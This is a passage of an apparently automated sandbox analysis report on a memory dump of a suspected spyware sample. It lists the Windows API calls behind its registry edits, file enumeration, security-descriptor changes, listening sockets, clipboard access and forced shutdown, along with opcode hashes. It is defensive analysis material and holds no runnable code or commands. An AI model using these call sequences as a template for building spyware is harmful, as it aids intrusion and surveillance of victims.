                                                      • FindClose.KERNEL32(00000000), ref: 00AEF727
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                      • String ID: *.*
                                                      • API String ID: 1803514871-438819550
                                                      • Opcode ID: b4358540e0764c84b2dd5db9b8964d684c1dff5aa65e52d687f9203fb6a67350
                                                      • Instruction ID: a39a12f7ac5934ebdc4dfff1d67ca53316b53c79780bd0e3c3040b29936ea73e
                                                      • Opcode Fuzzy Hash: b4358540e0764c84b2dd5db9b8964d684c1dff5aa65e52d687f9203fb6a67350
                                                      • Instruction Fuzzy Hash: 3B31B372641259AFDF10EFB5AC59AEE77ACDF09321F5041A5F804E30A0EF74DA84CA60
                                                      APIs
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B00FB3
                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00B10980,00000000,?,00000000,?,?), ref: 00B01021
                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00B01069
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00B010F2
                                                      • RegCloseKey.ADVAPI32(?), ref: 00B01412
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00B0141F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectCreateRegistryValue
                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                      • API String ID: 536824911-966354055
                                                      • Opcode ID: c62216011ed2ed2a8bb6de0fd3c40cf993b91a33ddfeebd1db1b44f83b4abdcc
                                                      • Instruction ID: 0157368f75a130f5ace867b07d64a6f91a6bc837548b540a12e1c8be55ecf997
                                                      • Opcode Fuzzy Hash: c62216011ed2ed2a8bb6de0fd3c40cf993b91a33ddfeebd1db1b44f83b4abdcc
                                                      • Instruction Fuzzy Hash: 4B028F752046029FCB14EF29C981E2ABBE5FF89714F04895DF85A9B3A1DB30EC41CB91
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00AEF756
                                                      • _wcscmp.LIBCMT ref: 00AEF76B
                                                      • _wcscmp.LIBCMT ref: 00AEF782
                                                        • Part of subcall function 00AE4875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00AE4890
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00AEF7B1
                                                      • FindClose.KERNEL32(00000000), ref: 00AEF7BC
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00AEF7D8
                                                      • _wcscmp.LIBCMT ref: 00AEF7FF
                                                      • _wcscmp.LIBCMT ref: 00AEF816
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00AEF828
                                                      • SetCurrentDirectoryW.KERNEL32(00B3B578), ref: 00AEF846
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AEF850
                                                      • FindClose.KERNEL32(00000000), ref: 00AEF85D
                                                      • FindClose.KERNEL32(00000000), ref: 00AEF86F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                      • String ID: *.*
                                                      • API String ID: 1824444939-438819550
                                                      • Opcode ID: 938830d2de86aa94d26c41d3358c0904bc163287b0ce217d438118f98a4fcc12
                                                      • Instruction ID: 1d1e2cd1fdc405e9680cf9be35be3d0411c235c3c9c078cbb28b14674084f31b
                                                      • Opcode Fuzzy Hash: 938830d2de86aa94d26c41d3358c0904bc163287b0ce217d438118f98a4fcc12
                                                      • Instruction Fuzzy Hash: 0531927250025AAEDB10AFB6DC59AEE77ACDF09321F1041A5F904A31A0DB70DE858A60
                                                      APIs
                                                        • Part of subcall function 00AD8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AD8E3C
                                                        • Part of subcall function 00AD8E20: GetLastError.KERNEL32(?,00AD8900,?,?,?), ref: 00AD8E46
                                                        • Part of subcall function 00AD8E20: GetProcessHeap.KERNEL32(00000008,?,?,00AD8900,?,?,?), ref: 00AD8E55
                                                        • Part of subcall function 00AD8E20: HeapAlloc.KERNEL32(00000000,?,00AD8900,?,?,?), ref: 00AD8E5C
                                                        • Part of subcall function 00AD8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AD8E73
                                                        • Part of subcall function 00AD8EBD: GetProcessHeap.KERNEL32(00000008,00AD8916,00000000,00000000,?,00AD8916,?), ref: 00AD8EC9
                                                        • Part of subcall function 00AD8EBD: HeapAlloc.KERNEL32(00000000,?,00AD8916,?), ref: 00AD8ED0
                                                        • Part of subcall function 00AD8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AD8916,?), ref: 00AD8EE1
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AD8931
                                                      • _memset.LIBCMT ref: 00AD8946
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AD8965
                                                      • GetLengthSid.ADVAPI32(?), ref: 00AD8976
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00AD89B3
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AD89CF
                                                      • GetLengthSid.ADVAPI32(?), ref: 00AD89EC
                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AD89FB
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00AD8A02
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AD8A23
                                                      • CopySid.ADVAPI32(00000000), ref: 00AD8A2A
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AD8A5B
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AD8A81
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AD8A95
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                      • String ID:
                                                      • API String ID: 3996160137-0
                                                      • Opcode ID: 49c0694cd70fc63c43d7ae606d0a1bd1e05cf2b171b70c62e14e70b4723fb4cb
                                                      • Instruction ID: 2372a81eda0b28e439d7e74801b2922c0008dea72dbe742bff2e16c150dfe883
                                                      • Opcode Fuzzy Hash: 49c0694cd70fc63c43d7ae606d0a1bd1e05cf2b171b70c62e14e70b4723fb4cb
                                                      • Instruction Fuzzy Hash: 82612875910209BFDF00DFA5DC45AEEBB79FF04300F04812AF956A72A0DB799A55CB60
                                                      APIs
                                                        • Part of subcall function 00B0147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0040D,?,?), ref: 00B01491
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B00B0C
                                                        • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                        • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B00BAB
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B00C43
                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00B00E82
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00B00E8F
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 1240663315-0
                                                      • Opcode ID: 1621f4b68b71e2e97c23282b8934bcfc51397d032e194e36ceeb674822a9db70
                                                      • Instruction ID: 7e7a856659c8892f4cba781e5e0f6aada2f414666fe5f16b8cd0a4e066d67e81
                                                      • Opcode Fuzzy Hash: 1621f4b68b71e2e97c23282b8934bcfc51397d032e194e36ceeb674822a9db70
                                                      • Instruction Fuzzy Hash: 8BE17F31614205AFCB14EF28C995E6ABBE5FF89714F0489ADF44ADB2A1DB30ED01CB51
                                                      APIs
                                                      • __swprintf.LIBCMT ref: 00AE4451
                                                      • __swprintf.LIBCMT ref: 00AE445E
                                                        • Part of subcall function 00AA38C8: __woutput_l.LIBCMT ref: 00AA3921
                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 00AE4488
                                                      • LoadResource.KERNEL32(?,00000000), ref: 00AE4494
                                                      • LockResource.KERNEL32(00000000), ref: 00AE44A1
                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 00AE44C1
                                                      • LoadResource.KERNEL32(?,00000000), ref: 00AE44D3
                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00AE44E2
                                                      • LockResource.KERNEL32(?), ref: 00AE44EE
                                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00AE454F
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                      • String ID:
                                                      • API String ID: 1433390588-0
                                                      • Opcode ID: a24556327d73be4477278b4193869d4fbe4d96dc7ae94caf3ec69ed5a12f768e
                                                      • Instruction ID: 761d1cc266ef443a0f8968b0df8572d94229c193405c197b5a60da1e31650683
                                                      • Opcode Fuzzy Hash: a24556327d73be4477278b4193869d4fbe4d96dc7ae94caf3ec69ed5a12f768e
                                                      • Instruction Fuzzy Hash: F1318E7160125AABDB11AF61ED48ABF7BACFB09301F408425F912D7150DB74DE50CAB0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                      • String ID:
                                                      • API String ID: 1737998785-0
                                                      • Opcode ID: 9ce11b021aed973167225765d66e3c187d4791bb403ab847335e2a05e9c45345
                                                      • Instruction ID: 9a2f9202f1e4fd1cc3b6bc1d1b5b30341c34903aaceb58f99cbb3ac6f7ea3817
                                                      • Opcode Fuzzy Hash: 9ce11b021aed973167225765d66e3c187d4791bb403ab847335e2a05e9c45345
                                                      • Instruction Fuzzy Hash: 0E21A1312052159FDB01BF64ED49B6E77A8EF88721F008019FA069B2A1DFB0AD50CB94
                                                      APIs
                                                        • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00AEFA83
                                                      • FindClose.KERNEL32(00000000), ref: 00AEFB96
                                                        • Part of subcall function 00A852B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A852E6
                                                      • Sleep.KERNEL32(0000000A), ref: 00AEFAB3
                                                      • _wcscmp.LIBCMT ref: 00AEFAC7
                                                      • _wcscmp.LIBCMT ref: 00AEFAE2
                                                      • FindNextFileW.KERNEL32(?,?), ref: 00AEFB80
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                      • String ID: *.*
                                                      • API String ID: 2185952417-438819550
                                                      • Opcode ID: 404026fd22709555525fd043264d74c6c1dc47464f628504031e88d13b674193
                                                      • Instruction ID: 551ae5fe0c37e6d61b01301717388f15272f09623a767e4e8430fa692ee6025e
                                                      • Opcode Fuzzy Hash: 404026fd22709555525fd043264d74c6c1dc47464f628504031e88d13b674193
                                                      • Instruction Fuzzy Hash: 0341817194025AAFCF14DF65CD59AEEBBB8FF05350F548166F814A32A1EB309E84CB90
                                                      APIs
                                                        • Part of subcall function 00AD9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AD93E3
                                                        • Part of subcall function 00AD9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AD9410
                                                        • Part of subcall function 00AD9399: GetLastError.KERNEL32 ref: 00AD941D
                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00AE57B4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                      • String ID: $@$SeShutdownPrivilege
                                                      • API String ID: 2234035333-194228
                                                      • Opcode ID: e721262ad05997935b8691677d104cd68df0dd9c3aa12ff0c8e4f795375d2182
                                                      • Instruction ID: e3152a27dd9a5abf8797c7b2302ad7412285eed8a2e443c51ae6b479b77e3375
                                                      • Opcode Fuzzy Hash: e721262ad05997935b8691677d104cd68df0dd9c3aa12ff0c8e4f795375d2182
                                                      • Instruction Fuzzy Hash: BF01F731E50756EAE7286377BC8ABBB7268AB05748F24082AF953D70D2DE505C608150
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00AF69C7
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AF69D6
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00AF69F2
                                                      • listen.WSOCK32(00000000,00000005), ref: 00AF6A01
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AF6A1B
                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00AF6A2F
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                      • String ID:
                                                      • API String ID: 1279440585-0
                                                      • Opcode ID: c3e5313ecd021c791df899781dedd168576626e5260461eac3cfe54dc5697ca1
                                                      • Instruction ID: 11ff48fb67b9397f4254dacc3b628392fa9af721353e0d11add09defde0549cf
                                                      • Opcode Fuzzy Hash: c3e5313ecd021c791df899781dedd168576626e5260461eac3cfe54dc5697ca1
                                                      • Instruction Fuzzy Hash: B8219E306006059FCB10FFA8C989A7EB7B9EF48724F148659F956A73E1DB70AC41CB91
                                                      APIs
                                                        • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00A81DD6
                                                      • GetSysColor.USER32(0000000F), ref: 00A81E2A
                                                      • SetBkColor.GDI32(?,00000000), ref: 00A81E3D
                                                        • Part of subcall function 00A8166C: DefDlgProcW.USER32(?,00000020,?), ref: 00A816B4
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ColorProc$LongWindow
                                                      • String ID:
                                                      • API String ID: 3744519093-0
                                                      • Opcode ID: 22b794f2e1eefbe508c1aa68618d2d0775d66d84d1597adc1d6fd11e355b86f9
                                                      • Instruction ID: 9a6ca7a4f13cab923abbe56785d79b75f8f97104a88b6e336fca80e322c46f42
                                                      • Opcode Fuzzy Hash: 22b794f2e1eefbe508c1aa68618d2d0775d66d84d1597adc1d6fd11e355b86f9
                                                      • Instruction Fuzzy Hash: ACA123B4125404BBE628BBA98C49FBF3EADEB46341F24460AF402D61D2DF659D03D376
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00AEC329
                                                      • _wcscmp.LIBCMT ref: 00AEC359
                                                      • _wcscmp.LIBCMT ref: 00AEC36E
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00AEC37F
                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00AEC3AF
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Find$File_wcscmp$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 2387731787-0
                                                      • Opcode ID: 4dd4294185aef1178520a1d78cf7b948de02779ec452810da133fb8c9847423d
                                                      • Instruction ID: b3b13407ad4320c9cd50a7ad8277f858afd22e43ae8001c2875ecf6b146b41a9
                                                      • Opcode Fuzzy Hash: 4dd4294185aef1178520a1d78cf7b948de02779ec452810da133fb8c9847423d
                                                      • Instruction Fuzzy Hash: E8519A756046029FC714EF69C591EAAB3E8FF49320F10861DF95A8B3A1DB30ED05CB91
                                                      APIs
                                                        • Part of subcall function 00AF8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00AF84A0
                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00AF6E89
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AF6EB2
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00AF6EEB
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AF6EF8
                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00AF6F0C
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 99427753-0
                                                      • Opcode ID: 3ca34e94f80d7f34fe6edfd3b67a20549c813f4ef1832b25cbc49a9bdad41e35
                                                      • Instruction ID: e830fbe02662b6b2b9a80afc3f8fa3223b542ebce2ecd5dbe5ff19fd629fb052
                                                      • Opcode Fuzzy Hash: 3ca34e94f80d7f34fe6edfd3b67a20549c813f4ef1832b25cbc49a9bdad41e35
                                                      • Instruction Fuzzy Hash: 1541D375600215AFDB10BFA4DD86F7E77A8DF48724F048558FA16AB3D2EA709D008BA1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                      • String ID:
                                                      • API String ID: 292994002-0
                                                      • Opcode ID: f87efcbf1854d9092afee6e66a56b51b5d5da2629fe22c7af7e85a8605a741b5
                                                      • Instruction ID: 648c980480628243c1c74e95b4b22b551074198d8838a542c2ad2fc64abfcc3f
                                                      • Opcode Fuzzy Hash: f87efcbf1854d9092afee6e66a56b51b5d5da2629fe22c7af7e85a8605a741b5
                                                      • Instruction Fuzzy Hash: 9211BF723009169FE7316F669C84A6FBFD9EF84760B408169F806D7281DE70E9018FA0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
